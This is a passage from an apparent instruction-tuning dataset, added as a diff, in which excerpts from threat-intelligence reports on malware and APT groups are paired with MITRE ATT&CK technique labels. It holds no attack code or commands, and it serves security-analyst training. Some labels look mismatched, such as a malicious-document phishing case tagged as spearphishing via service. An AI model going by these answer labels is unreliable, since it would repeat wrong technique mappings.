T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Unlike the original geacon, Blackrota uses gobfuscate to obfuscate the. source code before compiling. gobfuscate is an open-source tool for Go code. obfuscation, which can obfuscate the following elements of Go source code. with random character substitutions:", + "output": "- T1001: Data Obfuscation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As the Top Twenty shows, DNSChanger is also widespread. There is actually a connection between Zlob and DNSChanger \u2013 we believe they were created by the same gang. Although DNSChanger underwent many changes during its lifespan, basically what it does is simply change the DNS servers from the user\u2019s computer to a set of two specific IP addresses. The IP addresses are selected from a huge pool and the variation comes in distributing thousand of different DNSChanger binaries, each one setting the DNS servers to distinct IP addresses. While changing the DNS servers may not be regarded as something seriously malicious, an attacker who achieves this can actually do a lot of harm \u2013 for instance, redirecting websites such as Amazon.com or Bank Of America to phishing installations almost entirely without any sign of warning to the user. To complicate removal, the most recent DNSChangers include rootkit components and even download additional malware.", + "output": "- T1014: Rootkit" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The group\u2019s arsenal at that point included multiple Trojans and tools for Windows and macOS. In 2015, the actors started to expand their espionage efforts from PCs to mobile devices using the spyware called MobileOrder, which focused on compromising Android devices. Based on the code similarity, shared infrastructure and victimology, we conclude that the new wave of attacks belongs to the same threat actor and that the group continues to deploy and develop MobileOrder malware until this day. In addition to clear code overlaps, we observed multiple overlaps in the infrastructure between the new samples and the old MobileOrder malware variant, as well as multiple variants of Windows Psylo Trojan previously attributed to Scarlet Mimic, that interact with the same malicious domains as the mobile malware.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The downloader\u2019s process termination starts with killing the DDG Monero miner botnet client if present on the system, followed by a variety of other cryptominers, including other XMRig instances. This behavior is indicative of attempting to secure more host resources from competing miners. The malware also targets services belonging to Qihoo 360, an antivirus service, in order to reduce the chance of detection. However, taskkill is unable to to kill process related to Qihoo 360. Figure 5 shows the processes that the script attempts to terminate.", + "output": "- T1518.001: Software Discovery - Security Software Discovery\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The BazarLoader ISO downloaded from the OneDrive link, consists of a malicious DLL and shortcut file named \u201cDocuments.lnk\u201d which executes the DLL via rundll32.exe.", + "output": "- T1218.011: System Binary Proxy Execution - Rundll32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The last type of shellcode is a Cobalt Strike stager. We have confirmed the use of several different Cobalt Strike stager shellcodes since October 2019. In addition, some of the observed Cobalt Strike stager samples included a setting in the HTTP header of their malicious communications to disguise them as common jQuery request in order to evade detection by security products.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN13 rolled many of these reconnaissance efforts into scripts to automate their processes. For example, they used pi.bat to iterate through a list of IP addresses in a file, execute a ping command and write the output to a file (Figure 6). A similar script used dnscmd to export a host\u2019s DNS zones to a file.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- T1595.001: Active Scanning - Scanning IP Blocks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The injected wermgr.exe process then creates a new folder in the user\u2019s AppData directory. As typically seen in Trickbot infections, it drops a copy of itself into this folder along with its encrypted config (settings.ini) and a batch file (launcher.bat).\u00a0", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The dropper extracts the communications and wiper components from resources named \u201cPKCS7\u201d and \u201cPKCS12\u201d respectively, while the x86 sample extracts the x64 variant of Disttrack from a resource named \u201cX509\u201d. To extract the components, the dropper is configured to seek specific offsets within the resource, read a specified number of bytes and decrypt the contents using a specified key. The key exists in the sample as a base64 encoded string that the dropper will decode then use each byte of the resulting string to XOR the data obtained from the resource. When determining the location of the ciphertext within the resource, the dropper subtracts 14 from the offset value in the sample\u2019s configuration as an additional layer of obfuscation. Table 1 shows the resources within the Disttrack x86 sample, the component it contains and the values needed to decrypt its contents.", + "output": "- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It appears Russian cyber criminals were equally perplexed by the WCry campaign as the rest of the world. One of the members of the popular underground community complained about the recently purchased Virtual Private Server (VPS) which was almost immediately infected by ransomware even before the system update was completed.", + "output": "- T1584.003: Compromise Infrastructure - Virtual Private Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cutwail spam levels in the last three months have been significantly lower. The introduction of steganography may suggest that NARWHAL SPIDER has been developing new, innovative methods to evade detection and improve infection rates. Although not commonly used by eCrime actors, steganography has been used for malware delivery in the past, such as the Lurk Downloader and StegoLoader.", + "output": "- T1001.002: Data Obfuscation - Steganography\n- T1027.003: Obfuscated Files or Information - Steganography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malicious library completes malware installation. Specifically, it creates a registry value responsible for automatically running RMS at system startup. Notably, in most cases of this campaign the registry value is placed in the RunOnce key, instead of the Run key, enabling the malware to run automatically only the next time the system starts up. After that, the malware needs to create the registry value again.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Last March, we reported a WildPressure campaign targeting industrial-related entities in the Middle East. While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Reaver encrypts this data using an incremental XOR key and uploads it to the configured remote server on the port specified. The following example Python code shows how this encryption takes place:", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If any of the above files or directories exist, the Windows executable throws an exception and exits. This indicates Redaman checks if it is running in a sandbox or similar type of analysis environment.", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After opening the doc file (which is again a Web Archive File), the exploit drops and executes the Trojan program \u201csvcmondr.exe\u201d (8052234dcd41a7d619acb0ec9636be0b).", + "output": "- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "And finally, a mention of Trojan-Downloader.Win32.CWS.j, another common site on malicious websites. This downloader is basically a small stub which downloads and installs variants of CWS, perhaps better known as CoolWebSearch. CoolWebSearch is a malicious program which was first reported circa 2003. Ever since, a huge number of variants have been found in the wild, most of them following the same pattern of hijacking the browser startup page and displaying pornographic pop-ups. Over time, CWS variants have become more and more complex and the latest versions include rootkit stealth components and retro features designed to terminate antivirus programs.", + "output": "- T1588.001: Obtain Capabilities - Malware\n- T1014: Rootkit\n- T1176: Browser Extensions" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Russian-speaking APT group Turla (known variously as \u2018Snake\u2019, \u2018Uroburos\u2019, \u2018Venomous Bear\u2019 and \u2018KRYPTON\u2019) has been active since at least 2007 (and maybe even longer). Its activities have been traced to many high-profile incidents, including the 2008 attack against the US Central Command (the Buckshot Yankee incident) and, more recently, the attack against the Swiss military contractor, RUAG. We\u2019ve discuss its activities on a number of occasions (here, here, here and here). The group intensified its activities in 2014, targeting Ukraine, EU-related institutions, governments of EU countries, global foreign affairs ministries, media companies and possibly corruption-related targets in Russia. In 2015 and 2016 the group diversified its activities, switching from the Epic Turla watering-hole framework to the Gloog Turla framework, which is still active. The group also expanded its spear-phishing activities with the Skipper/WhiteAtlas attacks, which made use of new malware. Recently, the group has intensified its satellite-based C2 registrations ten-fold compared to the 2015 average.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Based on posts on an underground forum, we believe that the developer of Chthonic supplies binaries to other cyber-criminals and rents out the C2 infrastructure. Therefore, this distribution of victims likely represents several otherwise unconnected cyber-crime operations.", + "output": "- T1583: Acquire Infrastructure\n- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When the news broke in 2014 about a new sophisticated threat actor dubbed the Turla Group, which the Estonian foreign intelligence service believes has Russian origins and operates on behalf of the FSB, its kernelmode malware also became the first publicly-described case that abused a third-party device driver to disable Driver Signature Enforcement (DSE). This security mechanism was introduced in Windows Vista to prevent unsigned drivers from loading into kernel space. Turla exploited the signed VirtualBox driver, VBoxDrv.sys v1.6.2, to deactivate DSE and load its unsigned payload drivers afterward.", + "output": "- T1211: Exploitation for Defense Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Since December 2017 security researchers have been seeing samples of MS Office documents in spearphishing emails related to the Winter Olympics uploaded to VirusTotal. The documents contained nothing but slightly formatted gibberish to make it look like the text had an encoding problem, encouraging the user to press a button to \u201cEnable Content\u201d.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Interestingly, the ChChes samples we observed were digitally signed using a certificate originally used by HackingTeam and later part of the data leaked when they were themselves hacked. Wapack labs also observed a similar sample targeting Japan in November. It\u2019s not clear why the attackers chose to use this certificate, as it was old, had been leaked online, and had already been revoked by the time they used it. Digital certificates are typically used because they afford an air of legitimacy, which this one definitely does not.", + "output": "- T1596.003: Search Open Technical Databases - Digital Certificates" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The authors of Black Lambert included a couple of very interesting details in the sample, which read as the following: toolType=wl, build=132914, versionName = 2.0.0. Looking for similar samples, we were able to identify another generation of related tools which we called White Lambert. While Black Lambert connects directly to its C&C for instructions, White Lambert is a fully passive, network-driven backdoor.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In Figure 4, the first DNS query to resolve is. . yFIOr645245444143544544.windows64x[.]com which acts as an initial beacon. The first five characters (yFIOr) are random and have no purpose other than generating random subdomains in order to avoid DNS caching. The next two characters (64) signify the Hex notation of the d request type, which is the request type for the initial beacon as noted in Table 3. The request type is followed by the system specific hostname hardcoded into the sample, which in this case is 5245444143544544 for .", + "output": "- T1583.002: Acquire Infrastructure - DNS Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As soon as the proof-of-concept (PoC) for CVE-2020-9054 was made publicly available last month, this vulnerability was promptly abused to infect vulnerable versions of Zyxel network-attached storage (NAS) devices with a new Mirai variant \u2013 Mukashi.", + "output": "- T1588.006: Obtain Capabilities - Vulnerabilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This is exceedingly noisy traffic. Furthermore, Hancitor has demonstrated a noticeable lack of stealth in deploying and using this ping tool. Such an unusual EXE file is easy to notice, especially when the results of its scan are saved as a text file in the same directory.", + "output": "- T1588.002: Obtain Capabilities - Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In our previous article, we mentioned since this GPON Vulnerability (CVE-2018-10561, CVE-2018-10562 )\u00a0announced, there have been at least five botnets family mettle, muhstik, mirai, hajime, satori actively exploit the vulnerability to build their zombie army in just 10 days.", + "output": "- T1203: Exploitation for Client Execution\n- T1584.005: Compromise Infrastructure - Botnet\n- T1588.006: Obtain Capabilities - Vulnerabilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Palo Alto Networks WildFire observed commands provided by the C2 server for the known Helminth samples. The commands, as seen below, show that the threat actors are attempting to do initial information gathering on the system, including available user accounts, username, computer name, running tasks, services, network services and if remote desktop is enabled.", + "output": "- T1590: Gather Victim Network Information\n- T1049: System Network Connections Discovery\n- T1082: System Information Discovery\n- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Wekby group continues to target various high profile organizations using sophisticated malware. The pisloader malware family uses various novel techniques, such as using DNS as a C2 protocol, as well as making use of return-oriented programming and other anti-analysis tactics.", + "output": "- T1583.002: Acquire Infrastructure - DNS Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While analyzing this intrusion, we observed further persistence via scheduled tasks associated with post-exploitation activities.. . This scheduled task with name HpSupport executed a Cobalt Strike Beacon kaslose64.dll both on the Domain Controller and the File Server:", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In total Unit 42 has seen over 50 versions of these weaponized documents spanning from late October through to March. We\u2019ve used these to lay out a timeline, which will be referenced throughout the remainder of this blog, of the milestones of evolution that provides some insight into why the changes are made. Note: This figure does not cover all versions seen but simply milestone changes. It does however start with the first version created on October 23rd, last saved 25th October and first seen by our Wildfire cloud sandbox 26th October.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Throughout the intrusion, the injected Cobalt Strike Processes utilized various named pipes for inter-process communications. Many of these pipes used default Cobalt Strike pipe patterns.", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the Emissary service, which the Trojan will store in and access from the following registry keys:", + "output": "- T1574.011: Hijack Execution Flow - Services Registry Permissions Weakness" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": ". . The bot will report key information back to the C&C, including the result of the various custom API executions. The first communications include any hard-coded C&C followed by the DGA. Shifu uses RC4 encryption in the network communications. Notably, the key for the samples analyzed by iSIGHT Partners is actually the default RC4 key included with the Crypto library, further suggesting this malware is under development. The following is the key observed:", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 32 shows QUADAGENT issuing DNS requests with incrementing sequence numbers and the C2 providing the session identifier and pre-shared key within the IPv6 answers. The screenshot also shows the Trojan sending a DNS query to notify the C2 that it successfully received the data.", + "output": "- T1583.002: Acquire Infrastructure - DNS Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"For this method, Ransom Cartel uses a tool named \"\"\"\"DonPAPI,\"\"\"\" which can search hosts for DPAPI blobs containing Wi-Fi keys, RDP passwords, and credentials saved in web browsers and then download and decrypt them locally on the machine.\"", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Using spear-phishing emails that contained malicious Amazon-themed documents, the group targeted an employee of an aerospace company in the Netherlands and a political journalist in Belgium.", + "output": "- T1566.003: Phishing - Spearphishing via Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It reads and executes commands from a text file stored in Mega cloud storage", + "output": "- T1530: Data from Cloud Storage" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", 